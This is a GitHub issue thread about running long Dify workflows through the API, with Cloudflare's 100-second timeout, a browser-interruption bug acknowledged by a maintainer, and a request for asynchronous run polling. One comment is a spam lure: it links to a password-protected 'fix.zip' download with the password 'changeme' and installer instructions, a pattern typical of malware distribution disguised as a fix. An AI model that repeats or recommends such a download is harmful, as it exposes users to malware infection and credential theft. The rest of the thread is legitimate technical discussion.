### ISSUE TITLE
Issues with Long-Running Workflow and Browser Interactions

### ISSUE THREAD

**Issue by hzho2000** [langgenius/dify#7662]
### Self Checks

- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Provide a description of requested docs changes

I am working with a workflow that runs for approximately 30 minutes and involves around 180 iterations. I would like to know how to correctly use API calls for such a long-running workflow to ensure stability and efficiency.

Additionally, I have noticed that when testing this workflow in the browser, any action such as switching browser windows, minimizing the browser, or the display going to sleep causes the iterative calls within the workflow to stop. This interruption significantly hampers the testing process.

Could you please provide guidance on how to handle long workflows with the API, and how to avoid disruptions caused by browser interactions during testing?

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by crazywoola** [comment]
I have record a [video](https://www.bilibili.com/video/BV1mi421a7ST) regarding the limitations and environments you need to know.

> Additionally, I have noticed that when testing this workflow in the browser, any action such as switching browser windows, minimizing the browser, or the display going to sleep causes the iterative calls within the workflow to stop. This interruption significantly hampers the testing process.
We do not have capacity to refine this behavior at this moment, this is a known issue. We will handle it later.

**Comment by hzho2000** [comment]
> I have record a [video](https://www.bilibili.com/video/BV1mi421a7ST) regarding the limitations and environments you need to know.
> 
> > Additionally, I have noticed that when testing this workflow in the browser, any action such as switching browser windows, minimizing the browser, or the display going to sleep causes the iterative calls within the workflow to stop. This interruption significantly hampers the testing process.
> > We do not have capacity to refine this behavior at this moment, this is a known issue. We will handle it later.

I noticed in the API documentation that due to Cloudflare restrictions, requests will be interrupted if no response is returned within 100 seconds. If I use blocking mode and increase the execution time limit, will I still be able to get a response successfully? Alternatively, how should we handle API calls for very long workflows?

**Comment by tipani86** [comment]
+1 on this. I am also wondering if it's possible to support asynchronous workflow runs.

Not necessarily exactly the same use case as the OP's, but let's say I am calling workflow API from my own backend, and that workflow might involve some longer-running tools, taking several minutes to complete.

To not hit against the 100 second Cloudflare restriction per request, I would like to only kick-off the workflow from the API, then get its `run_id` (or equivalent) so that I can periodically check for the run's status, let's say every 60 seconds or so.

Once the run either succeeds, fails or times out (some relatively long time, for example max 15-30 minutes, maybe this can also be set in the initial kick-off request?), the status check endpoint would also return its result (if succeeded).

If the status is pending or running etc., I would just wait another minute and check again.
